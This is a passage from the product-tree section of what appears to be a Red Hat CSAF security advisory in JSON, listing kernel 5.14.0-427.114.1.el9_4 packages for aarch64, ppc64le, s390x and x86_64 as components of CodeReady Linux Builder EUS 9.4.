"product_reference": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
